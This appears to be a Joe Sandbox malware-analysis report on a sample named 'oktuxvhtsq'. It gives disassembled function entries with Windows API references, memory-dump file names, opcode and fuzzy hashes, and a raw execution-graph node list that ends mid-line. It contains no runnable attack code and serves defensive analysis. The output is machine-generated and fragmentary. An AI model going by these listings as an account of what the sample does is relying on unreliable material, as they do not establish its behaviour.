                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prolog3_
                                  • String ID:
                                  • API String ID: 2427045233-3916222277
                                  • Opcode ID: 3bb267ec27fb3332219eb9eaac7cb896bfd6da9ca562e418f0187729ae5a19f8
                                  • Instruction ID: b75de62933ca69aa3a2de2d7f85a5b6c3851e23c03171160e2342b56abe1866f
                                  • Opcode Fuzzy Hash: 3bb267ec27fb3332219eb9eaac7cb896bfd6da9ca562e418f0187729ae5a19f8
                                  • Instruction Fuzzy Hash: B6517E319002059FDF24DB96C480AAEB7B1FF58324F54483EE942B77C1D738A955CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004067A0: __Getcvt.LIBCPMT ref: 004067AF
                                  • _Maklocchr.LIBCPMTD ref: 0040704F
                                  • _Maklocchr.LIBCPMTD ref: 00407066
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Maklocchr$Getcvt
                                  • String ID: pB
                                  • API String ID: 1068779903-3059159000
                                  • Opcode ID: 2ab8de39bbb2b37282b8e654738e84b15c8aff831b67239a12815e7fcf2c1cb0
                                  • Instruction ID: 355146b3e8986f8a6780d4a2e3957cce70afceab5ade8ca11c79d162e8a9a7ef
                                  • Opcode Fuzzy Hash: 2ab8de39bbb2b37282b8e654738e84b15c8aff831b67239a12815e7fcf2c1cb0
                                  • Instruction Fuzzy Hash: 3A417FB5E00209ABCB04DF91D851BAFB775AF84304F20812EE5056B3C1DB75AA42CBE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041EE05 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleOutputCP.KERNEL32 ref: 0041EE68
                                    • Part of subcall function 00424311: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00421F6C,?,00000000,-00000008), ref: 00424372
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0041F0BA
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041F100
                                  • GetLastError.KERNEL32 ref: 0041F1A3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: f4d446c7503e1caa4bc12088dfa2aa6da3dfbd4309480915beb3954a17425044
                                  • Instruction ID: 60cf06c8ceb0ea5622d3c444de1fe9ac85f18442b5a7983a7f22b62e23fd56b5
                                  • Opcode Fuzzy Hash: f4d446c7503e1caa4bc12088dfa2aa6da3dfbd4309480915beb3954a17425044
                                  • Instruction Fuzzy Hash: 3ED18D75D00288EFDF14CFA9D880AEDBBB4FF49314F28452AE816E7351D634A946CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004072A0 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::ios_base::good$char_traits
                                  • String ID:
                                  • API String ID: 1812610724-0
                                  • Opcode ID: eeb8f94b9ed67efd90668f5281338567e17da3a2cc540025e6dc43144ba327f4
                                  • Instruction ID: 9152e7101a80daff8bfac9f51ad5fc1f3c72c29d40b5916afd4a3ffe7faa4ee7
                                  • Opcode Fuzzy Hash: eeb8f94b9ed67efd90668f5281338567e17da3a2cc540025e6dc43144ba327f4
                                  • Instruction Fuzzy Hash: FD514174E042099BCB04DB65C891A7FB776EF85304F14812ED9127B3D2DB3DA806DB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B100 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: char_traits
                                  • String ID:
                                  • API String ID: 1158913984-0
                                  • Opcode ID: a5343bf2346bdb53e67bd871a3801ee3ca0ad45806965aedfa5f842b9be2caf6
                                  • Instruction ID: a8902f6be5721ce8c6493102739b7e83ca2cc6847c7aa7f5647aebcc1ea0a5cb
                                  • Opcode Fuzzy Hash: a5343bf2346bdb53e67bd871a3801ee3ca0ad45806965aedfa5f842b9be2caf6
                                  • Instruction Fuzzy Hash: 433184B5D00208ABCB04EFA1D851AEE7775AF50348F04407FE9017B282EB3D9A95C7DA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B9D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fpos
                                  • String ID:
                                  • API String ID: 1083263101-0
                                  • Opcode ID: 35462dccf0758a2ee716e78d3c3bd8a0bb9d6883d135a31e14104f2abf990f43
                                  • Instruction ID: 329a20781235309f49dfdd178b828fc557bafb4d1009888ab75be2d596dfbd6a
                                  • Opcode Fuzzy Hash: 35462dccf0758a2ee716e78d3c3bd8a0bb9d6883d135a31e14104f2abf990f43
                                  • Instruction Fuzzy Hash: 5E31D875A10109EFCB04DF99D991DEEB7B5EF88300F5081AAE905A7291E734AF00CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405370 Relevance: 6.1, APIs: 4, Instructions: 59COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00405398
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 004053C9
                                  • new.LIBCMT ref: 004053D2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: 2b5eaf0dcdf67d288a6363ed27ef4a31213a6677d72f55555049c1e4a6f99ce9
                                  • Instruction ID: ed6f9a79429c89acc8542604aa524be87d10e3adc822abb8cc19a903b67f55c3
                                  • Opcode Fuzzy Hash: 2b5eaf0dcdf67d288a6363ed27ef4a31213a6677d72f55555049c1e4a6f99ce9
                                  • Instruction Fuzzy Hash: 34216F70D01508EBDF14DFA5C58079EB7B1EF44345F1085AAE8156B281D378AA90CF49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411AB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00411ACE
                                    • Part of subcall function 00412106: ___AdjustPointer.LIBCMT ref: 00412150
                                  • _UnwindNestedFrames.LIBCMT ref: 00411AE5
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00411AF7
                                  • CallCatchBlock.LIBVCRUNTIME ref: 00411B1B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • String ID:
                                  • API String ID: 2633735394-0
                                  • Opcode ID: 290c27d956fc69be8811d5bde271c4c0a4e5c50b55fa3a1459f3ed676d75112c
                                  • Instruction ID: 0dae1eca49bf3e44668aecf27d4fec388fac26295aa8cdfbd0b11976d9886a99
                                  • Opcode Fuzzy Hash: 290c27d956fc69be8811d5bde271c4c0a4e5c50b55fa3a1459f3ed676d75112c
                                  • Instruction Fuzzy Hash: 3F01D732000109BBCF12AF56CC41EDB3FBAFF48754F15841AFA5865121D77AE8A1DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042C769 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • WriteConsoleW.KERNEL32 ref: 0042C780
                                  • GetLastError.KERNEL32(?,0042847E,00000000,00000001,?,?,?,0041F1F7,?,00000000,00000000,?,?,?,0041F7D1,00000000), ref: 0042C78C
                                    • Part of subcall function 0042C752: CloseHandle.KERNEL32(FFFFFFFE), ref: 0042C762
                                  • ___initconout.LIBCMT ref: 0042C79C
                                    • Part of subcall function 0042C714: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 0042C727
                                  • WriteConsoleW.KERNEL32 ref: 0042C7B1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: b984403707ad243fa86e60d953929dc35c343f4df83341fb6bac7fbd876e38fa
                                  • Instruction ID: e7eb7c13d01b286deb2aa3facca690a0e7735a60948a661f092ff582ac54949b
                                  • Opcode Fuzzy Hash: b984403707ad243fa86e60d953929dc35c343f4df83341fb6bac7fbd876e38fa
                                  • Instruction Fuzzy Hash: 0BF01236200135BBCF221FD2EC44A9E3F26FB493E0B444425FA1895130C7318921DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407480 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 320COMMON
                                  Download Yara Rule
                                  APIs
                                  • ctype.LIBCPMTD ref: 0040755E
                                  • std::ios_base::width.LIBCPMTD ref: 004077E4
                                    • Part of subcall function 00404CE0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00404CEA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWorkctypestd::ios_base::width
                                  • String ID: @
                                  • API String ID: 46849196-2766056989
                                  • Opcode ID: 0476d762f8e1408e5cb70a481e6eb6227674a0d484e298158af9c116490829e3
                                  • Instruction ID: 53ccb4a0ce088ce96476172d5abb8a6e5729ef52891f82e14a3172199b56a592
                                  • Opcode Fuzzy Hash: 0476d762f8e1408e5cb70a481e6eb6227674a0d484e298158af9c116490829e3
                                  • Instruction Fuzzy Hash: EBD138B5D04108AFCB04DF99C991EEE77B5AF88304F14816EF905A7291DB38AE41CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419A4D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                  Download Yara Rule
                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 00419ADD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: d097e38db029b6f7b8f3f83937a4e4599330315c6ff27636a9713bea47fd4f16
                                  • Instruction ID: 21fe5a5527b016725bab4f6e656bc787fcae53af7891aa4435ab6e8fcb17bfd6
                                  • Opcode Fuzzy Hash: d097e38db029b6f7b8f3f83937a4e4599330315c6ff27636a9713bea47fd4f16
                                  • Instruction Fuzzy Hash: 37518B71B0910196CB11BF14FA113EB67B0EF80B52F654C6BE095413A8EB3D9DC59A4E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405770 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004058B7
                                  • char_traits.LIBCPMTD ref: 004058C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                  • String ID: 4j@
                                  • API String ID: 1444011685-904746723
                                  • Opcode ID: 82387f88945d7fc4a208b6de69c27e0afa750967242fa1480a9dd887b6e8295d
                                  • Instruction ID: 46023dceab305a3eb23035ba61cdc51870224976be2fd264dcc29fd4d9b3516e
                                  • Opcode Fuzzy Hash: 82387f88945d7fc4a208b6de69c27e0afa750967242fa1480a9dd887b6e8295d
                                  • Instruction Fuzzy Hash: A0410F71D145099BCB04FF69C952AAFB7B5EF84315F20413EE506B72D1DA386D00CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041563B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                  Download Yara Rule
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00415722
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: D$D
                                  • API String ID: 4062629308-2831827411
                                  • Opcode ID: f424810cff8c00d17c5f5efda1cad0ea5d0d04c9426438ff04658dc35123a906
                                  • Instruction ID: 8bf0dc9f21e63ffe1c3a491cffe23ff22630031f7c2e2f17320c2df5dce1e844
                                  • Opcode Fuzzy Hash: f424810cff8c00d17c5f5efda1cad0ea5d0d04c9426438ff04658dc35123a906
                                  • Instruction Fuzzy Hash: 0931E5B1A00601CBDB149F689C416EE37609BC5328F24421BF429973D1D77CD8828BD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004154C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                  Download Yara Rule
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0041559B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: D$D
                                  • API String ID: 4062629308-2831827411
                                  • Opcode ID: e83a423f03ac780c5fcfa94935c75a4d87f91eff9022599b95c25b231ccda2e8
                                  • Instruction ID: af507a5548210d163da6b3945c1a53315e90f2d32a076a82bd498c751c2e98c8
                                  • Opcode Fuzzy Hash: e83a423f03ac780c5fcfa94935c75a4d87f91eff9022599b95c25b231ccda2e8
                                  • Instruction Fuzzy Hash: 2E31D4B1E00A109BDB149FA998012EE77A29FC5334F24431FE425973D5D77C99828A9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004017F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00401825
                                    • Part of subcall function 00408DD0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00408DDA
                                  • DeleteFileW.KERNEL32(00000000,?,?,0040161C), ref: 00401845
                                  Strings
                                  • Failed to delete file: , xrefs: 0040187F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::details::$Affinity::operator!=Base::ContextDeleteFileHardwareIdentityQueueWork
                                  • String ID: Failed to delete file:
                                  • API String ID: 3573704698-802139604
                                  • Opcode ID: feb77c48e4971e188bfb18358a924c05519349d9b34b932e87aeae2c37e92d24
                                  • Instruction ID: f0f5bbdc8a2f0b1badd532eae22d6cb083b84698526b75bf131117a7413fce91
                                  • Opcode Fuzzy Hash: feb77c48e4971e188bfb18358a924c05519349d9b34b932e87aeae2c37e92d24
                                  • Instruction Fuzzy Hash: CC210071910108ABCB04FB91D851DEEB779AE94304B50467EB502B71E1EF386A05CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004058B7
                                  • char_traits.LIBCPMTD ref: 004058C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                  • String ID: 4j@
                                  • API String ID: 1444011685-904746723
                                  • Opcode ID: f9284e6f84bfce3802ce3be7d534924ee2909510edccafd6454c1df85963241b
                                  • Instruction ID: 883a3b899775eae1976112d965841a78aa284a8c2867d14a93e0f1d9c6bfb98f
                                  • Opcode Fuzzy Hash: f9284e6f84bfce3802ce3be7d534924ee2909510edccafd6454c1df85963241b
                                  • Instruction Fuzzy Hash: F801ED71E041099BCB14FF95D952BAFB379EF84315F10813EA515B72D1CA396E00CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:1.7%
                                  Dynamic/Decrypted Code Coverage:2.4%
                                  Signature Coverage:6%
                                  Total number of Nodes:552
                                  Total number of Limit Nodes:68
                                  execution_graph 82113 41f0e0 82114 41f0eb 82113->82114 82116 41b930 82113->82116 82117 41b956 82116->82117 82124 409d30 82117->82124 82119 41b962 82120 41b983 82119->82120 82132 40c1b0 82119->82132 82120->82114 82122 41b975 82168 41a670 82122->82168 82125 409d3d 82124->82125 82171 409c80 82124->82171 82127 409d44 82125->82127 82183 409c20 82125->82183 82127->82119 82133 40c1d5 82132->82133 82597 40b1b0 82133->82597 82135 40c22c 82601 40ae30 82135->82601 82137 40c252 82167 40c4a3 82137->82167 82610 414390 82137->82610 82139 40c297 82139->82167 82613 408a60 82139->82613 82141 40c2db 82141->82167 82620 41a4c0 82141->82620 82145 40c331 82146 40c338 82145->82146 82632 419fd0 82145->82632 82147 41bd80 2 API calls 82146->82147 82150 40c345 82147->82150 82150->82122 82151 40c382 82152 41bd80 2 API calls 82151->82152 82153 40c389 82152->82153 82153->82122 82154 40c392 82155 40f490 3 API calls 82154->82155 82156 40c406 82155->82156 82156->82146 82157 40c411 82156->82157 82158 41bd80 2 API calls 82157->82158 82159 40c435 82158->82159 82637 41a020 82159->82637 82162 419fd0 2 API calls 82163 40c470 82162->82163 82163->82167 82642 419de0 82163->82642 82166 41a670 2 API calls 82166->82167 82167->82122 82169 41af20 LdrLoadDll 82168->82169 82170 41a68f ExitProcess 82169->82170 82170->82120 82172 409c93 82171->82172 82222 418b80 LdrLoadDll 82171->82222 82202 418a30 82172->82202 82175 409ca6 82175->82125 82176 409c9c 82176->82175 82205 41b270 82176->82205 82178 409ce3 82178->82175 82216 409aa0 82178->82216 82180 409d03 82223 409620 LdrLoadDll 82180->82223 82182 409d15 82182->82125 82184 409c3a 82183->82184 82185 41b560 LdrLoadDll 82183->82185 82572 41b560 82184->82572 82185->82184 82188 41b560 LdrLoadDll 82189 409c61 82188->82189 82190 40f170 82189->82190 82191 40f189 82190->82191 82580 40b030 82191->82580 82193 40f19c 82584 41a1a0 82193->82584 82196 409d55 82196->82119 82198 40f1c2 82199 40f1ed 82198->82199 82590 41a220 82198->82590 82201 41a450 2 API calls 82199->82201 82201->82196 82224 41a5c0 82202->82224 82206 41b289 82205->82206 82237 414a40 82206->82237 82208 41b2a1 82209 41b2aa 82208->82209 82276 41b0b0 82208->82276 82209->82178 82211 41b2be 82211->82209 82294 419ec0 82211->82294 82550 407ea0 82216->82550 82218 409ac1 82218->82180 82219 409aba 82219->82218 82563 408160 82219->82563 82222->82172 82223->82182 82227 41af20 82224->82227 82226 418a45 82226->82176 82228 41af30 82227->82228 82230 41af52 82227->82230 82231 414e40 82228->82231 82230->82226 82232 414e4e 82231->82232 82233 414e5a 82231->82233 82232->82233 82236 4152c0 LdrLoadDll 82232->82236 82233->82230 82235 414fac 82235->82230 82236->82235 82238 414d75 82237->82238 82248 414a54 82237->82248 82238->82208 82241 414b80 82305 41a320 